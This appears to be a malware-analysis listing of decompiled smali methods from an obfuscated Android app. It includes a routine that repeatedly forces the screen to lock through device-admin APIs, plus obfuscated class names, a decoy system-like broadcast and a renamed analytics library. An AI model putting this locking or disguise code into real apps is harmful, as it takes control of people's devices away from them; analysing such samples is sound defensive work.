  • \n
Position Instruction Meta Information
1invoke-direct {p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;-><init>(Ljava/lang/String;)V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->Odjrct:Ljava/lang/String;
5const-string v1, "\n"
7invoke-virtual {v0, v1}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
8move-result-object v1
9new-instance v0, Ljava/util/ArrayList;
11invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
12iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->DiXsQ:Ljava/util/ArrayList;
13array-length v2, v1
14const/4 v0, 0x0
15goto_14: if-ge v0, v2, :cond_25
16aget-object v3, v1, v0
17try_start_18:
18iget-object v4, p0, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->DiXsQ:Ljava/util/ArrayList;
19new-instance v5, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;
21invoke-direct {v5, v3}, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;-><init>(Ljava/lang/String;)V
23invoke-virtual {v4, v5}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
24goto_22: add-int/lit8 v0, v0, 0x1
25goto/16 :goto_14
26cond_25: return-void
27catch_26: move-exception v3
28goto/16 :goto_22
Cross References
APIs
  • android.util.Pair.<init>
  • java.util.ArrayList.<init>
  • java.util.Collections.addAll
Strings
  • activity
Position Instruction Meta Information
0new-instance v0, Landroid/util/Pair;
1const-class v1, Landroid/content/Context;
3invoke-direct {v0, v1, p1}, Landroid/util/Pair;-><init>(Ljava/lang/Object;Ljava/lang/Object;)V
4new-instance v1, Landroid/util/Pair;
5const-class v2, Landroid/content/Intent;
7invoke-direct {v1, v2, p2}, Landroid/util/Pair;-><init>(Ljava/lang/Object;Ljava/lang/Object;)V
8new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;
10const-string v3, "activity"
11const/4 v4, 0x2
12new-array v4, v4, [Landroid/util/Pair;
13const/4 v5, 0x0
14aput-object v0, v4, v5
15const/4 v0, 0x1
16aput-object v1, v4, v0
17new-instance v0, Ljava/util/ArrayList;
19invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
21invoke-static {v0, v4}, Ljava/util/Collections;->addAll(Ljava/util/Collection;[Ljava/lang/Object;)Z
23invoke-virtual {p0, v3, v0}, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->DiXsQ(Ljava/lang/String;Ljava/util/ArrayList;)Ljava/lang/Object;
24move-result-object v0
26invoke-direct {v2, p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/bsLhBT;-><init>(Lcom/czybg/eqtbdmzpklrgyns/Module;Ljava/lang/Object;)V
27return-object v2
Cross References
APIs
  • java.lang.Object.<init>
  • java.util.ArrayList.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2const/4 v0, 0x1
3iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->DiXsQ:Z
4const/4 v0, 0x0
5iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->Odjrct:I
6new-instance v0, Ljava/util/ArrayList;
8invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->LmcGi:Ljava/util/List;
10new-instance v0, Ljava/util/ArrayList;
12invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
13iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->hZyMGHgz:Ljava/util/List;
14new-instance v0, Ljava/util/ArrayList;
16invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
17iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->xnLvoQ:Ljava/util/List;
18new-instance v0, Ljava/util/ArrayList;
20invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
21iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->jVOak:Ljava/util/List;
22new-instance v0, Ljava/util/ArrayList;
24invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
25iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uwsSQRG;->CyGFDR:Ljava/util/ArrayList;
26return-void
APIs
  • android.app.Activity.onCreate
  • com.czybg.eqtbdmzpklrgyns.BaseActivity.setContentView
  • com.czybg.eqtbdmzpklrgyns.BaseActivity.findViewById
  • android.view.View.setOnClickListener
  • com.czybg.eqtbdmzpklrgyns.BaseActivity.findViewById
  • android.view.View.setOnClickListener
Position Instruction Meta Information
0.param p1, "savedInstanceState" # Landroid/os/Bundle;
1.prologue
3invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
4const v0, 0x7f040001
6invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;->setContentView(I)V
7const v0, 0x7f090004
9invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;->findViewById(I)Landroid/view/View;
10move-result-object v0
11new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity$1;
13invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity$1;-><init>(Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;)V
15invoke-virtual {v0, v1}, Landroid/view/View;->setOnClickListener(Landroid/view/View$OnClickListener;)V
16const v0, 0x7f090005
18invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;->findViewById(I)Landroid/view/View;
19move-result-object v0
20new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity$2;
22invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity$2;-><init>(Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;)V
24invoke-virtual {v0, v1}, Landroid/view/View;->setOnClickListener(Landroid/view/View$OnClickListener;)V
25return-void
Cross References
APIs
  • java.util.ArrayList.<init>
  • android.content.Context.getPackageManager
  • android.content.Context.getPackageName
  • android.content.pm.PackageManager.getPackageInfo
  • java.util.Collections.addAll
  • java.lang.Exception.printStackTrace
Position Instruction Meta Information
0new-instance v1, Ljava/util/ArrayList;
2invoke-direct {v1}, Ljava/util/ArrayList;-><init>()V
3try_start_5:
4invoke-virtual {p0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
5move-result-object v0
7invoke-virtual {p0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
8move-result-object v2
9const/16 v3, 0x1000
11invoke-virtual {v0, v2, v3}, Landroid/content/pm/PackageManager;->getPackageInfo(Ljava/lang/String;I)Landroid/content/pm/PackageInfo;
12move-result-object v0
14iget-object v2, v0, Landroid/content/pm/PackageInfo;->requestedPermissions:[Ljava/lang/String;
15if-eqz v2, :cond_1c
17iget-object v0, v0, Landroid/content/pm/PackageInfo;->requestedPermissions:[Ljava/lang/String;
19invoke-static {v1, v0}, Ljava/util/Collections;->addAll(Ljava/util/Collection;[Ljava/lang/Object;)Z
20try_end_1c: return-object v1
21catch_1d: move-exception v0
23invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
24goto/16 :goto_1c
APIs
  • android.content.Intent.putExtra
  • android.content.ComponentName.<init>
  • android.content.Intent.setComponent
  • android.content.Context.startActivity
Strings
  • _mid_
Position Instruction Meta Information
1const-string v0, "_mid_"
3iget-object v1, p1, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
4iget v1, v1, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
6invoke-virtual {p2, v0, v1}, Landroid/content/Intent;->putExtra(Ljava/lang/String;I)Landroid/content/Intent;
7new-instance v0, Landroid/content/ComponentName;
9iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/pWPzfqIH;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
11iget-object v1, v1, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->jVOak:Landroid/content/Context;
12const-class v2, Lcom/czybg/eqtbdmzpklrgyns/AyMuwwlC;
14invoke-direct {v0, v1, v2}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
16invoke-virtual {p2, v0}, Landroid/content/Intent;->setComponent(Landroid/content/ComponentName;)Landroid/content/Intent;
18iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/pWPzfqIH;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
20iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->jVOak:Landroid/content/Context;
22invoke-virtual {v0, p2}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
23return-void
Cross References
APIs
  • org.json.JSONObject.<init>
  • android.util.Base64.decode
  • java.lang.String.<init>
  • org.json.JSONObject.<init>
Strings
  • UTF-8
Position Instruction Meta Information
0try_start_0: new-instance v0, Lorg/json/JSONObject;
2invoke-direct {v0, p0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
3try_end_5: return-object v0
4catch_6: move-exception v0
5const/4 v0, 0x0
7invoke-static {p0, v0}, Landroid/util/Base64;->decode(Ljava/lang/String;I)[B
8move-result-object v1
9try_start_c: new-instance v0, Lorg/json/JSONObject;
10new-instance v2, Ljava/lang/String;
12const-string v3, "UTF-8"
14invoke-direct {v2, v1, v3}, Ljava/lang/String;-><init>([BLjava/lang/String;)V
16invoke-direct {v0, v2}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
17try_end_18: goto/16 :goto_5
18catch_19: move-exception v0
19const/4 v0, 0x0
20goto/16 :goto_5
Cross References
APIs
  • java.io.ByteArrayOutputStream.<init>
  • java.util.zip.GZIPOutputStream.<init>
  • java.io.ByteArrayOutputStream.toByteArray
  • java.util.zip.GZIPOutputStream.write
  • java.util.zip.GZIPOutputStream.close
Position Instruction Meta Information
0new-instance v0, Ljava/io/ByteArrayOutputStream;
2invoke-direct {v0}, Ljava/io/ByteArrayOutputStream;-><init>()V
3new-instance v1, Ljava/util/zip/GZIPOutputStream;
5invoke-direct {v1, v0}, Ljava/util/zip/GZIPOutputStream;-><init>(Ljava/io/OutputStream;)V
6try_start_a:
7invoke-virtual {p0}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
8move-result-object v2
10invoke-virtual {v1, v2}, Ljava/util/zip/GZIPOutputStream;->write([B)V
11try_end_11:
12invoke-virtual {v1}, Ljava/util/zip/GZIPOutputStream;->close()V
13return-object v0
14catchall_15: move-exception v0
16invoke-virtual {v1}, Ljava/util/zip/GZIPOutputStream;->close()V
17throw v0
Cross References
APIs
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
Strings
  • label
  • loadTime
Position Instruction Meta Information
0new-instance v0, Lorg/json/JSONObject;
2invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
3try_start_5:
4const-string v1, "label"
6iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ:Ljava/lang/String;
8invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
10const-string v1, "loadTime"
11iget v2, p0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->Odjrct:I
13invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
14try_end_13: return-object v0
15catch_14: move-exception v1
16goto/16 :goto_13
Cross References
APIs
  • android.content.Intent.<init>
  • android.content.Intent.putExtra
  • android.content.Intent.addFlags
  • android.content.Context.startActivity
Strings
  • exit
Position Instruction Meta Information
0new-instance v0, Landroid/content/Intent;
1const-class v1, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;
3invoke-direct {v0, p0, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
5const-string v1, "exit"
6const/4 v2, 0x1
8invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Z)Landroid/content/Intent;
9const v1, 0x14818000
11invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
13invoke-virtual {p0, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
14return-void
Cross References
APIs
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
Strings
  • delay
  • createdAt
Position Instruction Meta Information
0new-instance v0, Lorg/json/JSONObject;
2invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
4const-string v1, "delay"
5iget-wide v2, p0, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->DiXsQ:J
7invoke-virtual {v0, v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
9const-string v1, "createdAt"
10iget-wide v2, p0, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->Odjrct:J
12invoke-virtual {v0, v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
13return-object v0
APIs
  • java.lang.System.currentTimeMillis
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.os.Handler.postDelayed
Position Instruction Meta Information
0const-wide/32 v5, 0x2bf20
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/JPzRV;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;
4invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ(Landroid/content/Context;)Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
5move-result-object v0
7iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;
9iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/XpiFj;
11invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;->Odjrct()J
12move-result-wide v1
13add-long/2addr v1, v5
15invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
16move-result-wide v3
17cmp-long v1, v1, v3
18if-gez v1, :cond_1f
19iput-object p1, v0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->Odjrct:Ljava/util/ArrayList;
20goto_1c: iput-object p1, v0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->Odjrct:Ljava/util/ArrayList;
21return-void
22cond_1f:
23iget-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/XpiFj;
25invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/XpiFj;->Odjrct()J
26move-result-wide v1
27add-long/2addr v1, v5
29invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
30move-result-wide v3
31sub-long/2addr v1, v3
32new-instance v3, Landroid/os/Handler;
34invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
35move-result-object v4
37invoke-direct {v3, v4}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
38new-instance v4, Lcom/czybg/eqtbdmzpklrgyns/GJLSbjVe;
40invoke-direct {v4, v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/GJLSbjVe;-><init>(Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;Ljava/util/ArrayList;)V
42invoke-virtual {v3, v4, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
43goto/16 :goto_1c
APIs
  • java.util.concurrent.atomic.AtomicInteger.intValue
  • java.util.concurrent.atomic.AtomicInteger.set
  • android.app.admin.DevicePolicyManager.lockNow
  • android.os.Handler.postDelayed
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/OkDGL;->DiXsQ:Ljava/util/concurrent/atomic/AtomicInteger;
3invoke-virtual {v0}, Ljava/util/concurrent/atomic/AtomicInteger;->intValue()I
4move-result v0
5const/16 v1, 0x50
6if-ge v0, v1, :cond_26
8iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/OkDGL;->DiXsQ:Ljava/util/concurrent/atomic/AtomicInteger;
10iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/OkDGL;->DiXsQ:Ljava/util/concurrent/atomic/AtomicInteger;
12invoke-virtual {v1}, Ljava/util/concurrent/atomic/AtomicInteger;->intValue()I
13move-result v1
14add-int/lit8 v1, v1, 0x1
16invoke-virtual {v0, v1}, Ljava/util/concurrent/atomic/AtomicInteger;->set(I)V
18iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/OkDGL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
20iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->Odjrct:Landroid/app/admin/DevicePolicyManager;
22invoke-virtual {v0}, Landroid/app/admin/DevicePolicyManager;->lockNow()V
24iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/OkDGL;->Odjrct:Landroid/os/Handler;
25const-wide/16 v1, 0x32
27invoke-virtual {v0, p0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
28goto_25: return-void
29cond_26:
30iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/OkDGL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
32invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->Odjrct(Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;)Landroid/content/Context;
33move-result-object v0
35invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ(Landroid/content/Context;)V
36goto/16 :goto_25
Cross References
APIs
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.Collections.sort
  • java.util.List.get
Position Instruction Meta Information
1sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
3invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
4move-result-object v1
5cond_6:
6invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
7move-result v0
8if-eqz v0, :cond_30
10invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
11move-result-object v0
12check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
13iget-wide v2, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->Odjrct:J
14const-wide/16 v4, 0x0
15cmp-long v2, v2, v4
16if-nez v2, :cond_6
17goto_1a: if-nez v0, :cond_2f
19sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
20new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/FySkt;
22invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/FySkt;-><init>(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)V
24invoke-static {v0, v1}, Ljava/util/Collections;->sort(Ljava/util/List;Ljava/util/Comparator;)V
26sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
27const/4 v1, 0x0
29invoke-interface {v0, v1}, Ljava/util/List;->get(I)Ljava/lang/Object;
30move-result-object v0
31check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
32cond_2f: return-object v0
33cond_30: const/4 v0, 0x0
34goto/16 :goto_1a
APIs
  • android.app.Service.onCreate
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h.startForeground
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.os.Handler.post
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Service;->onCreate()V
2const/16 v0, 0xe4
4invoke-static {p0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->hZyMGHgz(Landroid/content/Context;)Landroid/app/Notification;
5move-result-object v1
7invoke-virtual {p0, v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;->startForeground(ILandroid/app/Notification;)V
8new-instance v0, Landroid/os/Handler;
10invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
11move-result-object v1
13invoke-direct {v0, v1}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
14new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/EzgWyUe;
16invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/EzgWyUe;-><init>(Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;)V
18invoke-virtual {v0, v1}, Landroid/os/Handler;->post(Ljava/lang/Runnable;)Z
19return-void
APIs
  • android.app.Activity.onCreate
  • com.czybg.eqtbdmzpklrgyns.ProgressActivity.setContentView
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.os.Handler.postDelayed
Position Instruction Meta Information
0.param p1, "savedInstanceState" # Landroid/os/Bundle;
1.prologue
3invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
4const v0, 0x7f040005
6invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;->setContentView(I)V
7new-instance v0, Landroid/os/Handler;
9invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
10move-result-object v1
12invoke-direct {v0, v1}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
13new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$1;
15invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$1;-><init>(Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;)V
16const-wide/16 v2, 0x1f40
18invoke-virtual {v0, v1, v2, v3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
19return-void
APIs
  • android.app.Activity.onCreate
  • com.czybg.eqtbdmzpklrgyns.SplashActivity.setContentView
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.os.Handler.postDelayed
Position Instruction Meta Information
0.param p1, "savedInstanceState" # Landroid/os/Bundle;
1.prologue
3invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
4const/high16 v0, 0x7f040000
6invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/SplashActivity;->setContentView(I)V
7new-instance v0, Landroid/os/Handler;
9invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
10move-result-object v1
12invoke-direct {v0, v1}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
13new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/SplashActivity$1;
15invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/SplashActivity$1;-><init>(Lcom/czybg/eqtbdmzpklrgyns/SplashActivity;)V
16const-wide/16 v2, 0x76c
18invoke-virtual {v0, v1, v2, v3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
19return-void
Cross References
APIs
  • java.io.ByteArrayOutputStream.toByteArray
  • java.io.ByteArrayInputStream.<init>
  • java.util.zip.GZIPInputStream.<init>
  • java.util.zip.GZIPInputStream.close
Position Instruction Meta Information
0new-instance v0, Ljava/util/zip/GZIPInputStream;
1new-instance v1, Ljava/io/ByteArrayInputStream;
3invoke-virtual {p0}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
4move-result-object v2
6invoke-direct {v1, v2}, Ljava/io/ByteArrayInputStream;-><init>([B)V
8invoke-direct {v0, v1}, Ljava/util/zip/GZIPInputStream;-><init>(Ljava/io/InputStream;)V
9try_start_e:
10invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/hZyMGHgz;->DiXsQ(Ljava/io/InputStream;)Ljava/io/ByteArrayOutputStream;
11try_end_11: move-result-object v1
13invoke-virtual {v0}, Ljava/util/zip/GZIPInputStream;->close()V
14return-object v1
15catchall_16: move-exception v1
17invoke-virtual {v0}, Ljava/util/zip/GZIPInputStream;->close()V
18throw v1
Cross References
APIs
  • java.io.ByteArrayOutputStream.<init>
  • java.io.InputStream.read
  • java.io.ByteArrayOutputStream.write
  • java.io.InputStream.close
Position Instruction Meta Information
0new-instance v0, Ljava/io/ByteArrayOutputStream;
2invoke-direct {v0}, Ljava/io/ByteArrayOutputStream;-><init>()V
3try_start_5: new-array v1, p1, [B
4goto_7:
5invoke-virtual {p0, v1}, Ljava/io/InputStream;->read([B)I
6move-result v2
7if-ltz v2, :cond_17
8const/4 v3, 0x0
10invoke-virtual {v0, v1, v3, v2}, Ljava/io/ByteArrayOutputStream;->write([BII)V
11try_end_11: goto/16 :goto_7
12catchall_12: move-exception v0
14invoke-virtual {p0}, Ljava/io/InputStream;->close()V
15throw v0
16cond_17:
17invoke-virtual {p0}, Ljava/io/InputStream;->close()V
18return-object v0
APIs
  • android.app.Service.onDestroy
  • android.content.Intent.<init>
  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.sendBroadcast
Strings
  • com.android.res
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Service;->onDestroy()V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
4if-eqz v0, :cond_f
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
8invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->Odjrct()V
9const/4 v0, 0x0
10iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
11cond_f: const/4 v0, 0x0
12iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->xnLvoQ:Z
13new-instance v0, Landroid/content/Intent;
15const-string v1, "com.android.res"
17invoke-direct {v0, v1}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
19invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->sendBroadcast(Landroid/content/Intent;)V
20return-void
Cross References
APIs
  • java.lang.Object.<init>
  • java.lang.String.split
  • java.lang.Integer.parseInt
Strings
  • :
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3const-string v0, ":"
5invoke-virtual {p1, v0}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
6move-result-object v0
7const/4 v1, 0x0
8aget-object v1, v0, v1
10invoke-static {v1}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
11move-result v1
12iput v1, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->DiXsQ:I
13const/4 v1, 0x1
14aget-object v1, v0, v1
15iput-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->Odjrct:Ljava/lang/String;
16const/4 v1, 0x2
17aget-object v0, v0, v1
18iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->LmcGi:Ljava/lang/String;
19return-void
APIs
  • java.lang.NullPointerException.<init>
  • java.lang.IllegalStateException.<init>
Strings
  • Answers Kit must not be null.
  • Answers Kit already set.
Position Instruction Meta Information
0if-nez p1, :cond_a
1new-instance v0, Ljava/lang/NullPointerException;
3const-string v1, "Answers Kit must not be null."
5invoke-direct {v0, v1}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
6throw v0
7cond_a:
8iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->answers:Lmpcom/crashlytics/android/answers/Answers;
9if-eqz v0, :cond_16
10new-instance v0, Ljava/lang/IllegalStateException;
12const-string v1, "Answers Kit already set."
14invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
15throw v0
16cond_16: iput-object p1, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->answers:Lmpcom/crashlytics/android/answers/Answers;
17return-object p0
APIs
  • java.lang.NullPointerException.<init>
  • java.lang.IllegalStateException.<init>
Strings
  • Beta Kit must not be null.
  • Beta Kit already set.
Position Instruction Meta Information
0if-nez p1, :cond_a
1new-instance v0, Ljava/lang/NullPointerException;
3const-string v1, "Beta Kit must not be null."
5invoke-direct {v0, v1}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
6throw v0
7cond_a:
8iget-object v0, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->beta:Lmpcom/crashlytics/android/beta/Beta;
9if-eqz v0, :cond_16
10new-instance v0, Ljava/lang/IllegalStateException;
12const-string v1, "Beta Kit already set."
14invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
15throw v0
16cond_16: iput-object p1, p0, Lmpcom/crashlytics/android/Crashlytics$Builder;->beta:Lmpcom/crashlytics/android/beta/Beta;
17return-object p0
APIs
  • java.lang.NullPointerException.<init>
  • java.lang.IllegalStateException.<init>
Strings
  • CrashlyticsCore Kit must not be null.
  • CrashlyticsCore Kit already set.
Position Instruction Meta Information
0if-nez p1, :cond_a
1new-instance v0, Ljava/lang/NullPointerException;
3const-string v1, "CrashlyticsCore Kit must not be null."
5invoke-direct {v0, v1}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
